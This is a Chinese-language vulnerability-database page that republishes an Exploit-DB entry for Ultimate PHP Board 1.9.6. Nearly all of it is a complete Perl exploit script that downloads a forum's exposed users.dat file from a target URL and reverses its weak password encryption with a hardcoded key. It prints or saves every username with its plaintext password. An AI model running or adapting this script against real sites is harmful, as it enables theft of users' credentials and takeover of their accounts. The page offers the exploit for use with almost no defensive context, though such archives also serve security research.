Ultimate PHP Board 1.9.6 GOLD – users.dat Password Decryptor-安全小百科

Ultimate PHP Board 1.9.6 GOLD – users.dat Password Decryptor

漏洞ID	1055169	漏洞类型
发布时间	2005-06-16	更新时间	2005-06-16
CVE编号	N/A	CNNVD-ID	N/A
漏洞平台	PHP	CVSS评分	N/A

|漏洞来源

https://www.exploit-db.com/exploits/1051

|漏洞详情

漏洞细节尚未披露

|漏洞EXP

#!/usr/bin/perl
#
# Passwords Decrypter for UPB <= 1.9.6
# Related advisory: http://www.securityfocus.com/archive/1/402461/30/0/threaded
# Discovered and Coded by Alberto Trivero

# Password file is located at: http://www.example.com/upb/db/users.dat   /str0ke


use Getopt::Std;
use LWP::Simple;
getopt('hfu');

print "nt========================================n";
print "t= Passwords Decrypter for UPB <= 1.9.6 =n";
print "t=          by Alberto Trivero          =n";
print "t========================================nn";

if(!$opt_h or !($opt_f or $opt_u) or ($opt_f && $opt_u)) {
   print "Usage:nperl $0 -h [full_target_path] [-f [output_file_name] OR -u [username]]nn";
   print "Examples:nperl $0 -h http://www.example.com/upb/ -f results.txtn";
   print "perl $0 -h http://www.example.com/upb/ -u Albyn";
   exit(0);
}

$key="wdnyyjinffnruxezrkowkjmtqhvrxvolqqxokuofoqtneltaomowpkfvmmogbayankrnrhmbduzfmpctxiidweripxwglmwrmdscoqyijpkzqqzsuqapfkoshhrtfsssmcfzuffzsfxdwupkzvqnloubrvwzmsxjuoluhatqqyfbyfqonvaosminsxpjqebcuiqggccl";
$page=get($opt_h."db/users.dat") || die "[-] Unable to retrieve: $!";
print "[+] Connected to: $opt_hn";
@page=split(/n/,$page);

if($opt_f) {
   open(RESULTS,"+>$opt_f") || die "[-] Unable to open $opt_f: $!";
   print RESULTS "Results for $opt_hn","="x40,"nn";
   for($in=0;$in<@page;$in++) {
      $page[$in]=~m/^(.*?)<~>/ && print RESULTS "Username: $1n";
      $page[$in]=~m/^$1<~>(.*?)<~>/ && print RESULTS "Crypted Password: $1n";
      &decrypt;
      print RESULTS "Decrypted Password: $cryptnn";
      $crypt="";
   }
   close(RESULTS);
   print "[+] Results printed correct in: $opt_fn";
}

if($opt_u) {
   for($in=0;$in<@page;$in++) {
      if($page[$in]=~m/^$opt_u<~>(.*?)<~>/) {
        print "[+] Username: $opt_un";
        print "[+] Crypted Password: $1n";
         &decrypt;
         print "[+] Decrypted Password: $cryptn";
         exit(0);
      }
   }
   print "[-] Username '$opt_u' doesn't existn";
}

sub decrypt {
   for($i=0;$i<length($1);$i++) {
      $i_key=ord(substr($key, $i, 1));
      $i_text=ord(substr($1, $i, 1));
      $n_key=ord(substr($key, $i+1, 1));
      $i_crypt=$i_text + $n_key;
      $i_crypt-=$i_key;
      $crypt.=chr($i_crypt);
   }
}

# milw0rm.com [2005-06-16]

相关推荐: PunBB 1.2.2 – Authentication Bypass

PunBB 1.2.2 – Authentication Bypass 漏洞ID 1054988 漏洞类型发布时间 2005-03-29 更新时间 2005-03-29 CVE编号 N/A CNNVD-ID N/A 漏洞平台 PHP CVSS评分 N/A |…

文章版权归作者所有，未经允许请勿转载。

THE END